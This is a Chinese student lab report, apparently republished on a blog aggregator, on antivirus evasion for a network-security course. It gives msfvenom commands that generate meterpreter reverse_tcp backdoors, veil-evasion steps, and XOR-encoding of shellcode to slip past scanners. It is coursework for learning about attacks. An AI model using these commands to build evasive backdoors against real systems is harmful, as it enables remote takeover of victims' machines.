2. 程式人生 > >20155220 網絡攻防技術 實驗三 免殺原理與實踐

20155220 網絡攻防技術 實驗三 免殺原理與實踐

阿新 發佈:2018-04-11
基於 back 網絡攻防 lis 方法 由於 原理 使用 生成可執行文件

網絡攻防技術 實驗三 免殺原理與實踐

使用msf生成後門程序的檢測

  • 首先我們對上次實驗生成的後門exe,利用VirSCAN進行檢測

技術分享圖片

技術分享圖片

  • 然後我們利用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.150.138(kali ip) lport=5220 x> 5220_backjar.jar
    生成jar文件,進行檢測。

技術分享圖片

技術分享圖片

技術分享圖片

使用veil-evasion生成反彈鏈接的可執行文件

  • 首先我們先對veil-evasion進行安裝,詳情可參考老師博客

  • 安裝好之後,我們利用veil,指令打開veil-evasion

  • 依次用use evasion

    list payloads,進入到payloads模板界面

  • 隨便選擇一個模板,將其復制,然後輸入use 5(你所復制的模板)

  • 然後輸入set LHOST kali-ipset LPORT 5220對其進行配置,然後輸入generate,生成。

技術分享圖片

技術分享圖片

利用shellcode編程實現免殺

  • 首先我們輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.138 LPORT=443 -f c

技術分享圖片

  • 根據老師所給的,將其變成C語言文件,進行編譯
  • 進行回連,回連成功

技術分享圖片

技術分享圖片

對shellcode進行更改

  • 我首先對其進行異或,我做的為異或0x83

技術分享圖片

  • 回連成功
    技術分享圖片
    技術分享圖片

  • 進行檢測,如圖
    技術分享圖片

    加殼

  • 加殼由於一系列原因失敗了,所以很難受。

    基礎問題

  • 1.殺軟是如何檢測出惡意代碼的?

  • 基於特征碼的檢測:殺毒軟件的病毒庫記錄了一些惡意軟件的特征碼,這些特征碼由一個不大於64字節的特征串組成,根據已檢測出或網絡上公布的病毒,對其提取特征碼,記錄成病毒庫,檢測到程序時將程序與特征碼比對即可判斷是否是惡意代碼。

  • .基於行為的惡意軟件檢測:在程序運行的狀態下(動態)對其行為進行監控,如果有敏感行為會被認為是惡意程序,是一種動態的監測與捕捉。

  • 2.免殺是做什麽?

  • 免殺是將二進制碼隱藏,或者變形

  • 3.免殺的基本方法有哪些?

  • 改變特征碼

  • 對exe可執行文件加殼:壓縮殼 加密殼

  • 基於payload重新編譯生成可執行文件

    實踐總結與體會

    本次實驗過程頗為曲折,首先在下載veil過程中無法安裝,再三嘗試後只得拷了一個虛擬機;
    然後對shellcode代碼更改後,回連出現了失敗,在組長的指導下順利解決了該問題。
    通過本次實驗,突然發現稍稍修改病毒就可以騙過好多殺毒軟件,讓我對現在電腦的安全性有了重新的審視;
    最後我還是趕緊去給電腦殺毒了。

20155220 網絡攻防技術 實驗三 免殺原理與實踐

相關推薦

20155220 攻防技術 實驗 原理實踐

基於 back 網絡攻防 lis 方法 由於 原理 使用 生成可執行文件 網絡攻防技術 實驗三 免殺原理與實踐 使用msf生成後門程序的檢測 首先我們對上次實驗生成的後門exe,利用VirSCAN進行檢測 然後我們利用msfvenom -p java/meterp

2017-2018-4 20155317《對抗技術》EXP3 原理實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

2018-2019-2 對抗技術 20165311 Exp3 原理實踐

col eno 比較 encode var 針對 name -s cnblogs 2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐 免殺原理及基礎問題回答 實驗內容 任務一:正確使用msf編碼器,msfvenom生成如j

2018-2019-2 對抗技術 20165334 Exp3 原理實踐

語言 保護 r文件 原理 添加 ima port 復制 png 2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐 一、實驗內容 任務一正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,利用shellc

2018-2019-2 對抗技術 20165210 Exp3 原理實踐

問題 網站 丟失 其他 圖片 https 壓縮包 exe 生成 2018-2019-2 網絡對抗技術 20165210 Exp3 免殺原理與實踐 免殺的概述 免殺,也就是反病毒(AntiVirus)與反間諜(AntiSpyware)的對立面,英文為Anti-AntiViru

2018-2019-2 對抗技術 20165326 Exp3 原理實踐

log ant tool 能夠 校驗和 nco bin .html 錯誤代碼 免殺原理與實踐 目錄 知識點問答 實踐內容 遇到的問題 心得體會 知識點 meterpreter免殺 基礎問題回答 殺軟是如何檢測出惡意代碼的? 特征碼(基於簽名):模式匹配,比對特

20165214 2018-2019-2 《對抗技術》Exp3 原理實踐 Week5

實現 進行 中間 信息 失敗 中一 網絡安全 需要 識別 《網絡對抗技術》Exp3 免殺原理與實踐 Week5 一、實驗內容 1、正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程; 2、通過組

20164317《對抗技術》Exp3 原理實踐

實驗中遇到的問題 不同的 靜默安裝 組合 alt ping 程序 upx 上一個 一、實驗要求 1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellco

2017-2018-2 20155230《對抗技術實驗3:原理實踐

語言 code 編碼 病毒 div 就是 加密 網絡 殺毒軟件 基礎問題回答 1、殺軟是如何檢測出惡意代碼的? 殺軟檢測惡意代碼主要有三種方式: ①特征碼的檢測:殺毒軟件的病毒庫記錄了一些惡意軟件的特征碼,這些特征碼由一個不大於64字節的字符串組成,且是只有該病毒內

20155201 攻防技術 實驗五 MSF基礎應用

HR creat 5.5 frame CP 控制臺 基礎 ado 解釋 20155201 網絡攻防技術 實驗五 MSF基礎應用 一、實踐內容 一個主動攻擊實踐,如ms08_067 一個針對瀏覽器的攻擊,如ms11_050 一個針對客戶端的攻擊,如Adobe 成功應用任何一

20155201 攻防技術 實驗八 Web基礎

修改密碼 註釋符 括號 命令註入 pda sql IT 攻防 哪裏 20155201 網絡攻防技術 實驗八 Web基礎 一、實踐內容 Web前端HTML,能正常安裝、啟停Apache。理解HTML,理解表單,理解GET與POST方法,編寫一個含有表單的HTML。 Web前

20155201 攻防技術 實驗九 Web安全基礎

cookie信息 。。 區分 基礎問題 永久 信息管理 註入攻擊 偽造 res 20155201 網絡攻防技術 實驗九 Web安全基礎 一、實踐內容 本實踐的目標理解常用網絡攻擊技術的基本原理。Webgoat實踐下相關實驗。 二、報告內容: 1. 基礎問題回答 1)SQ

對抗 Exp3 原理實踐 20154311 王卓然

下載軟件 get 改變 網站 加密 純手工 com 代碼 操作模式 Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? ①基於特征碼的檢測:AV軟件廠商通過檢測一個可執行文件是否包含一段與特征碼庫中相匹配的特征碼從而判斷是

20155217《對抗》Exp03 原理實踐

pre 使用 程序 use cnblogs 多次 scan www. 變化 20155217《網絡對抗》Exp03 免殺原理與實踐 實踐內容 正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工

20154307《對抗》Exp3 原理實踐

mark 我們 blocks 意思 釣魚 class 做了 更改權限 asio 20154307《網絡對抗》Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測:殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配,就會把該程

20155232《對抗》Exp3 原理實踐

分享圖片 alt 特征碼 apt 基本 什麽 簡單介紹 主機 介紹 20155232《網絡對抗》Exp3 免殺原理與實踐 問題回答 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測 特征碼:一段特征碼就是一段或多段數據。 如果一個可執行文件(或其

20155338《對抗》Exp3 原理實踐

調用 編寫 上傳 權限 免殺 編譯運行 tcp 檢查 語言 20155338《網絡對抗》Exp3 免殺原理與實踐 實驗過程 一、免殺效果參考基準 Kali使用上次實驗msfvenom產生後門的可執行文件,上傳到老師提供的網址http://www.virscan.org/上進

Exp3 原理實踐20154302薛師凡

代碼 AR 軟件 可執行文件 別了 模板生成 倒序 即使 get Exp3 免殺原理與實踐20154302薛師凡 一、實踐目標與內容 利用多種工具實現實現惡意代碼免殺 在另一臺電腦上,殺軟開啟的情況下,實現運行後門程序並回連成功。 在保證後門程序功能的情況下實現殺軟共存。

Exp3 原理實踐

asi 目標 專業 http lac 基礎 put 源文件 是個 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? -檢測特征碼 -基於行為檢測 -啟發式檢測類似 (2)免殺是做什麽? 使惡意軟件不被AV檢

20155202張旭 Exp3 原理實踐

ever 難受 virus 分片 告訴 kali 基於 文件夾 梳理 20155202張旭 Exp3 免殺原理與實踐 AV廠商檢測惡意軟件的方式主流的就三種: 基於特征碼的檢測 啟發式惡意軟件檢測 基於行為的惡意軟件檢測 我們要做的就是讓我們的惡意軟件沒法被這三種方式找到